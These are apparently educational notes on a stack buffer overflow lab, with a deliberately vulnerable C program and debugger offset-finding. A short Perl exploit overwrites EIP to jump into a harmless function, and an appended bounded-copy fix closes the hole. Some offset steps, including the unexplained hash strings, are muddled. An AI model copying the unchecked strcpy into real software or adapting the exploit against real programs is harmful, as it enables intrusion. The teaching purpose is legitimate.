Introduction to Buffer Overflow: Cyber Security Notes
A buffer overflow occurs in an application that is poorly coded, with no proper exception handling deployed at all. The attacker can change the value of EIP, overwriting it with the address of malicious code.
Requirements for Buffer Overflow
————
1. Windows OS
2. Vulnerable Application
DEVCPP 4.9.9
3. OllyDBG
4. Perl
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int overflow(char *s)
{
    char buffer[10];    // This is our buffer
    strcpy(buffer, s);  // This is the vulnerable code: no length check on s
    return 0;
}

// Never called in a normal run, because a is always 0 in main()
void exploit(void)
{
    printf("Buffer Overflow Chal Gya Hai....\n");
}

int main(int argc, char *argv[])
{
    printf("You are in the main code....\n");
    int a = 0;
    overflow(argv[1]);  // argv[1] is passed in unchecked
    if (a == 1)
    {
        exploit();
    }
    else
    {
        printf("Buffer Overflow Fail Ho Gya Hai....\n");
    }
    return 0;
}
nmap -sS -sC -sV 192.168.0.1 -Pn
int argc, char *argv[]
argc –> Number of arguments passed
argv –> Data of the argument passed
argv[1] –> -sS
argv[2] –> -sC
argv[3] –> -sV
argv[4] –> 192.168.0.1
argv[5] –> -Pn
00401316 |. E8 94FFFFFF CALL Ganesh.004012AF
00401316 —> Normal Form
EIP Always reads data in Little Endian Form
00401316
00 40 13 16
16 13 40 00 —> Little Endian Form
16 13 40 00 –> convert it into the hash
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
ganesh.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
Exception Offset: 35376239
ASCII Value
35376239 —> Convert it into Little Endian Form
35376239
35 37 62 39
39 62 37 35 —> ASCII Value
9b75
1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
1e66186a8e7f4a61ebaae3f46ae29b75
1e66186a8e7f4a61ebaae3f46ae2 9b75
A –> 41
B –> 42
C –> 43
D –> 44
E –> 45
28 times A + BCDE
AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE
42434445
45444342
Exception Offset: 45444342
Perl For Creating an exploit
my $junk="\x41" x 28; # 28 times A
my $EIP="\x16\x13\x40\x00"; # address of the malicious code
my $exploit=$junk.$EIP;
print "Buffer Overflow Fatne wala hai....\n";
system("ganesh.exe",$exploit);
print "Diwali Mubarak Ho...\n";
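The fix for the overflow() function shown earlier, as an added example that is not part of the original notes: the copy is bounded by the buffer size, so the 32-character test input (28 times A + BCDE) is rejected instead of reaching the saved return address. The names copy_checked, overflow_fixed and saved_survives, and the guard value 0xC0FFEE, are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 10 /* same size as buffer[] in the notes' overflow() */

/* Copy s into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if s is NULL or too long (dst is left untouched).
 * Hypothetical helper name, not from the original notes. */
int copy_checked(char *dst, size_t dst_size, const char *s)
{
    size_t len = 0;
    if (dst == NULL || dst_size == 0 || s == NULL)
        return -1;
    while (len < dst_size && s[len] != '\0') /* never scans past dst_size */
        len++;
    if (len == dst_size)
        return -1;           /* no room for the terminator: reject */
    memcpy(dst, s, len + 1); /* len + 1 <= dst_size */
    return 0;
}

/* Bounded counterpart of overflow(): same 10-byte local buffer. */
int overflow_fixed(const char *s)
{
    char buffer[BUF_SIZE];
    return copy_checked(buffer, sizeof buffer, s);
}

/* Stand-in for data that sits next to the buffer (in the real program, the
 * saved return address). Returns 1 if it is unchanged after the copy. */
int saved_survives(const char *s)
{
    struct { char buffer[BUF_SIZE]; unsigned int saved; } f = { {0}, 0xC0FFEEu };
    copy_checked(f.buffer, sizeof f.buffer, s);
    return f.saved == 0xC0FFEEu;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {          /* the original passes argv[1] unchecked */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (overflow_fixed(argv[1]) != 0) {
        fprintf(stderr, "input rejected: longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("input accepted\n");
    return 0;
}
```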
source – https://ufile.io/9os13